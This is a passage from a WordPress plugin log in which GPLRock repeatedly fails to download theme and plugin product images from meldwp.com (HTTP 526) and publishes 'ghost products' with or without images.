Code: 526, Error: . Retrying... [02-Apr-2026 20:18:49 UTC] GPLRock: Image download failed for product fundbar-fundraising-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundbar---fundraising-charity-wordpress-theme-4814.webp for product fundbar-fundraising-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:51 UTC] GPLRock: Image download failed for product fundbar-fundraising-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:53 UTC] GPLRock: Image download failed for product fundbar-fundraising-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundbar---fundraising-charity-wordpress-theme-4814.webp for product fundbar-fundraising-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:55 UTC] GPLRock WARNING: Image download failed for product fundbar-fundraising-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fundbar---fundraising-charity-wordpress-theme-4814.webp [02-Apr-2026 20:18:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fundbar-fundraising-charity-wordpress-theme [02-Apr-2026 20:18:55 UTC] GPLRock: Image download failed for product carforyou-automotive-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:57 UTC] GPLRock: Image download failed for product carforyou-automotive-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carforyou--automotive-car-dealer-wordpress-theme-1132.webp for product carforyou-automotive-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:00 UTC] GPLRock: Image download failed for product carforyou-automotive-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:02 UTC] GPLRock: Image download failed for product carforyou-automotive-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carforyou--automotive-car-dealer-wordpress-theme-1132.webp for product carforyou-automotive-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:04 UTC] GPLRock WARNING: Image download failed for product carforyou-automotive-car-dealer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/carforyou--automotive-car-dealer-wordpress-theme-1132.webp [02-Apr-2026 20:19:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: carforyou-automotive-car-dealer-wordpress-theme [02-Apr-2026 20:19:04 UTC] GPLRock: Image downloaded successfully for product regulations-law-firm-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-12f0d6cf.webp [02-Apr-2026 20:19:04 UTC] GPLRock: Using pre-downloaded image for product regulations-law-firm-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-12f0d6cf.webp [02-Apr-2026 20:19:04 UTC] GPLRock: Ghost product published with image - Product ID: regulations-law-firm-wordpress-theme [02-Apr-2026 20:19:04 UTC] GPLRock: Image download failed for product voyacht-yacht-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:06 UTC] GPLRock: Image download failed for product voyacht-yacht-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voyacht---yacht-wordpress-theme-12747.webp for product voyacht-yacht-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:09 UTC] GPLRock: Image download failed for product voyacht-yacht-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:11 UTC] GPLRock: Image download failed for product voyacht-yacht-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voyacht---yacht-wordpress-theme-12747.webp for product voyacht-yacht-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:13 UTC] GPLRock WARNING: Image download failed for product voyacht-yacht-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/voyacht---yacht-wordpress-theme-12747.webp [02-Apr-2026 20:19:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: voyacht-yacht-wordpress-theme [02-Apr-2026 20:19:13 UTC] GPLRock: Image download failed for product ione-minimal-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:15 UTC] GPLRock: Image download failed for product ione-minimal-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ione--minimal-woocommerce-theme-21905.webp for product ione-minimal-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:17 UTC] GPLRock: Image download failed for product ione-minimal-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:19 UTC] GPLRock: Image download failed for product ione-minimal-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ione--minimal-woocommerce-theme-21905.webp for product ione-minimal-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:21 UTC] GPLRock WARNING: Image download failed for product ione-minimal-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/ione--minimal-woocommerce-theme-21905.webp [02-Apr-2026 20:19:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ione-minimal-woocommerce-theme [02-Apr-2026 20:19:22 UTC] GPLRock: Image download failed for product green-grocery-grocery-store-organic-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:24 UTC] GPLRock: Image download failed for product green-grocery-grocery-store-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-grocery---grocery-store-organic-food-wordpress-theme-6306.webp for product green-grocery-grocery-store-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:26 UTC] GPLRock: Image download failed for product green-grocery-grocery-store-organic-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:28 UTC] GPLRock: Image download failed for product green-grocery-grocery-store-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-grocery---grocery-store-organic-food-wordpress-theme-6306.webp for product green-grocery-grocery-store-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:30 UTC] GPLRock WARNING: Image download failed for product green-grocery-grocery-store-organic-food-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/green-grocery---grocery-store-organic-food-wordpress-theme-6306.webp [02-Apr-2026 20:19:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: green-grocery-grocery-store-organic-food-wordpress-theme [02-Apr-2026 20:19:54 UTC] GPLRock: Image download failed for product photome-photography-portfolio-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:57 UTC] GPLRock: Image download failed for product photome-photography-portfolio-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:19:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photome--photography-portfolio-wordpress-19847.webp for product photome-photography-portfolio-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:19:59 UTC] GPLRock: Image download failed for product photome-photography-portfolio-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:01 UTC] GPLRock: Image download failed for product photome-photography-portfolio-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photome--photography-portfolio-wordpress-19847.webp for product photome-photography-portfolio-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:03 UTC] GPLRock WARNING: Image download failed for product photome-photography-portfolio-wordpress. URL: https://meldwp.com/wp-content/uploads/photome--photography-portfolio-wordpress-19847.webp [02-Apr-2026 20:20:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: photome-photography-portfolio-wordpress [02-Apr-2026 20:20:03 UTC] GPLRock: Image download failed for product infine-life-coach-and-business-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:05 UTC] GPLRock: Image download failed for product infine-life-coach-and-business-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infine---life-coach-and-business-coach-wordpress-theme-2662.webp for product infine-life-coach-and-business-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:07 UTC] GPLRock: Image download failed for product infine-life-coach-and-business-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:10 UTC] GPLRock: Image download failed for product infine-life-coach-and-business-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infine---life-coach-and-business-coach-wordpress-theme-2662.webp for product infine-life-coach-and-business-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:12 UTC] GPLRock WARNING: Image download failed for product infine-life-coach-and-business-coach-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/infine---life-coach-and-business-coach-wordpress-theme-2662.webp [02-Apr-2026 20:20:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infine-life-coach-and-business-coach-wordpress-theme [02-Apr-2026 20:20:12 UTC] GPLRock: Image downloaded successfully for product uomo-multipurpose-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afab641c.webp [02-Apr-2026 20:20:12 UTC] GPLRock: Using pre-downloaded image for product uomo-multipurpose-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afab641c.webp [02-Apr-2026 20:20:12 UTC] GPLRock: Ghost product published with image - Product ID: uomo-multipurpose-woocommerce-wordpress-theme [02-Apr-2026 20:20:12 UTC] GPLRock: Image download failed for product egovenz-city-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:14 UTC] GPLRock: Image download failed for product egovenz-city-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/egovenz---city-government-wordpress-theme-6266.webp for product egovenz-city-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:16 UTC] GPLRock: Image download failed for product egovenz-city-government-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:18 UTC] GPLRock: Image download failed for product egovenz-city-government-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/egovenz---city-government-wordpress-theme-6266.webp for product egovenz-city-government-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:20 UTC] GPLRock WARNING: Image download failed for product egovenz-city-government-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/egovenz---city-government-wordpress-theme-6266.webp [02-Apr-2026 20:20:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: egovenz-city-government-wordpress-theme [02-Apr-2026 20:20:21 UTC] GPLRock: Image download failed for product bailly-elementor-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:23 UTC] GPLRock: Image download failed for product bailly-elementor-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bailly---elementor-woocommerce-wordpress-theme-9837.webp for product bailly-elementor-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:25 UTC] GPLRock: Image download failed for product bailly-elementor-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:27 UTC] GPLRock: Image download failed for product bailly-elementor-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bailly---elementor-woocommerce-wordpress-theme-9837.webp for product bailly-elementor-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:29 UTC] GPLRock WARNING: Image download failed for product bailly-elementor-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bailly---elementor-woocommerce-wordpress-theme-9837.webp [02-Apr-2026 20:20:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bailly-elementor-woocommerce-wordpress-theme [02-Apr-2026 20:20:29 UTC] GPLRock: Image download failed for product vibra-music-wordpress-theme-for-djs-artists-and-festivals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:31 UTC] GPLRock: Image download failed for product vibra-music-wordpress-theme-for-djs-artists-and-festivals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vibra---music-wordpress-theme-for-djs-artists-and-festivals-18847.webp for product vibra-music-wordpress-theme-for-djs-artists-and-festivals after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:34 UTC] GPLRock: Image download failed for product vibra-music-wordpress-theme-for-djs-artists-and-festivals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:36 UTC] GPLRock: Image download failed for product vibra-music-wordpress-theme-for-djs-artists-and-festivals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vibra---music-wordpress-theme-for-djs-artists-and-festivals-18847.webp for product vibra-music-wordpress-theme-for-djs-artists-and-festivals after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:38 UTC] GPLRock WARNING: Image download failed for product vibra-music-wordpress-theme-for-djs-artists-and-festivals. URL: https://meldwp.com/wp-content/uploads/vibra---music-wordpress-theme-for-djs-artists-and-festivals-18847.webp [02-Apr-2026 20:20:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vibra-music-wordpress-theme-for-djs-artists-and-festivals [02-Apr-2026 20:20:39 UTC] GPLRock: Image download failed for product crafty-hands-arts-workshop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:41 UTC] GPLRock: Image download failed for product crafty-hands-arts-workshop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crafty-hands---arts--workshop-wordpress-theme-32839.webp for product crafty-hands-arts-workshop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:43 UTC] GPLRock: Image download failed for product crafty-hands-arts-workshop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:45 UTC] GPLRock: Image download failed for product crafty-hands-arts-workshop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crafty-hands---arts--workshop-wordpress-theme-32839.webp for product crafty-hands-arts-workshop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:47 UTC] GPLRock WARNING: Image download failed for product crafty-hands-arts-workshop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/crafty-hands---arts--workshop-wordpress-theme-32839.webp [02-Apr-2026 20:20:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crafty-hands-arts-workshop-wordpress-theme [02-Apr-2026 20:20:47 UTC] GPLRock: Image download failed for product coffeebean-portfolio-and-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:49 UTC] GPLRock: Image download failed for product coffeebean-portfolio-and-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coffeebean---portfolio-and-blogging-wordpress-theme-9116.webp for product coffeebean-portfolio-and-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:51 UTC] GPLRock: Image download failed for product coffeebean-portfolio-and-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:54 UTC] GPLRock: Image download failed for product coffeebean-portfolio-and-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coffeebean---portfolio-and-blogging-wordpress-theme-9116.webp for product coffeebean-portfolio-and-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:20:56 UTC] GPLRock WARNING: Image download failed for product coffeebean-portfolio-and-blogging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/coffeebean---portfolio-and-blogging-wordpress-theme-9116.webp [02-Apr-2026 20:20:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coffeebean-portfolio-and-blogging-wordpress-theme [02-Apr-2026 20:20:56 UTC] GPLRock: Image download failed for product eposi-minimal-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:20:58 UTC] GPLRock: Image download failed for product eposi-minimal-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:21:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eposi---minimal-theme-for-woocommerce-wordpress-4406.webp for product eposi-minimal-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:21:00 UTC] GPLRock: Image download failed for product eposi-minimal-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:21:02 UTC] GPLRock: Image download failed for product eposi-minimal-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:21:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eposi---minimal-theme-for-woocommerce-wordpress-4406.webp for product eposi-minimal-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:21:04 UTC] GPLRock WARNING: Image download failed for product eposi-minimal-theme-for-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/eposi---minimal-theme-for-woocommerce-wordpress-4406.webp [02-Apr-2026 20:21:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eposi-minimal-theme-for-woocommerce-wordpress [02-Apr-2026 20:21:05 UTC] GPLRock: Image download failed for product diwine-winery-wine-shop-vineyard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:21:07 UTC] GPLRock: Image download failed for product diwine-winery-wine-shop-vineyard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:21:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/diwine---winery--wine-shop-vineyard-wordpress-theme-19449.webp for product diwine-winery-wine-shop-vineyard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:21:09 UTC] GPLRock: Image download failed for product diwine-winery-wine-shop-vineyard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:21:11 UTC] GPLRock: Image download failed for product diwine-winery-wine-shop-vineyard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:21:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/diwine---winery--wine-shop-vineyard-wordpress-theme-19449.webp for product diwine-winery-wine-shop-vineyard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:21:13 UTC] GPLRock WARNING: Image download failed for product diwine-winery-wine-shop-vineyard-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/diwine---winery--wine-shop-vineyard-wordpress-theme-19449.webp [02-Apr-2026 20:21:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: diwine-winery-wine-shop-vineyard-wordpress-theme [03-Apr-2026 01:03:12 UTC] GPLRock: Image download failed for product event-venue-showcase-for-the-event-calendar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:15 UTC] GPLRock: Image download failed for product event-venue-showcase-for-the-event-calendar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/event-venue-showcase-for-the-event-calendar-20809.webp for product event-venue-showcase-for-the-event-calendar after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:17 UTC] GPLRock: Image download failed for product event-venue-showcase-for-the-event-calendar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:19 UTC] GPLRock: Image download failed for product event-venue-showcase-for-the-event-calendar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/event-venue-showcase-for-the-event-calendar-20809.webp for product event-venue-showcase-for-the-event-calendar after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:21 UTC] GPLRock WARNING: Image download failed for product event-venue-showcase-for-the-event-calendar. URL: https://meldwp.com/wp-content/uploads/event-venue-showcase-for-the-event-calendar-20809.webp [03-Apr-2026 01:03:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: event-venue-showcase-for-the-event-calendar [03-Apr-2026 01:03:21 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:23 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-image-hotspot-for-elementor-31037.webp for product osteo-image-hotspot-for-elementor after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:26 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:28 UTC] GPLRock: Image download failed for product osteo-image-hotspot-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-image-hotspot-for-elementor-31037.webp for product osteo-image-hotspot-for-elementor after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:30 UTC] GPLRock WARNING: Image download failed for product osteo-image-hotspot-for-elementor. URL: https://meldwp.com/wp-content/uploads/osteo-image-hotspot-for-elementor-31037.webp [03-Apr-2026 01:03:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: osteo-image-hotspot-for-elementor [03-Apr-2026 01:03:30 UTC] GPLRock: Image download failed for product measurement-tile-area-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:32 UTC] GPLRock: Image download failed for product measurement-tile-area-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/measurement-tile-area-for-woocommerce-11621.webp for product measurement-tile-area-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:34 UTC] GPLRock: Image download failed for product measurement-tile-area-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:36 UTC] GPLRock: Image download failed for product measurement-tile-area-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/measurement-tile-area-for-woocommerce-11621.webp for product measurement-tile-area-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:39 UTC] GPLRock WARNING: Image download failed for product measurement-tile-area-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/measurement-tile-area-for-woocommerce-11621.webp [03-Apr-2026 01:03:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: measurement-tile-area-for-woocommerce [03-Apr-2026 01:03:39 UTC] GPLRock: Image download failed for product wiloke-elementor-image-comparison (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:41 UTC] GPLRock: Image download failed for product wiloke-elementor-image-comparison (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-elementor-image-comparison-25073.webp for product wiloke-elementor-image-comparison after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:43 UTC] GPLRock: Image download failed for product wiloke-elementor-image-comparison (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:45 UTC] GPLRock: Image download failed for product wiloke-elementor-image-comparison (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-elementor-image-comparison-25073.webp for product wiloke-elementor-image-comparison after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:47 UTC] GPLRock WARNING: Image download failed for product wiloke-elementor-image-comparison. URL: https://meldwp.com/wp-content/uploads/wiloke-elementor-image-comparison-25073.webp [03-Apr-2026 01:03:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-elementor-image-comparison [03-Apr-2026 01:03:47 UTC] GPLRock: Image downloaded successfully for product app-portal-foxartstudios-codecanyon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-801b8e89.webp [03-Apr-2026 01:03:48 UTC] GPLRock: Using pre-downloaded image for product app-portal-foxartstudios-codecanyon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-801b8e89.webp [03-Apr-2026 01:03:48 UTC] GPLRock: Ghost product published with image - Product ID: app-portal-foxartstudios-codecanyon [03-Apr-2026 01:03:48 UTC] GPLRock: Image download failed for product academy-lms-offline-payment-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:50 UTC] GPLRock: Image download failed for product academy-lms-offline-payment-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/academy-lms-offline-payment-addon-13007.webp for product academy-lms-offline-payment-addon after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:52 UTC] GPLRock: Image download failed for product academy-lms-offline-payment-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:54 UTC] GPLRock: Image download failed for product academy-lms-offline-payment-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/academy-lms-offline-payment-addon-13007.webp for product academy-lms-offline-payment-addon after 3 attempts. HTTP Code: 526, Error: [03-Apr-2026 01:03:56 UTC] GPLRock WARNING: Image download failed for product academy-lms-offline-payment-addon. URL: https://meldwp.com/wp-content/uploads/academy-lms-offline-payment-addon-13007.webp [03-Apr-2026 01:03:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: academy-lms-offline-payment-addon [03-Apr-2026 01:03:56 UTC] GPLRock: Image download failed for product cariera-events-manager-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:03:58 UTC] GPLRock: Image download failed for product cariera-events-manager-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [03-Apr-2026 01:04:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cariera-events-manager-add-on-17446.webp for product 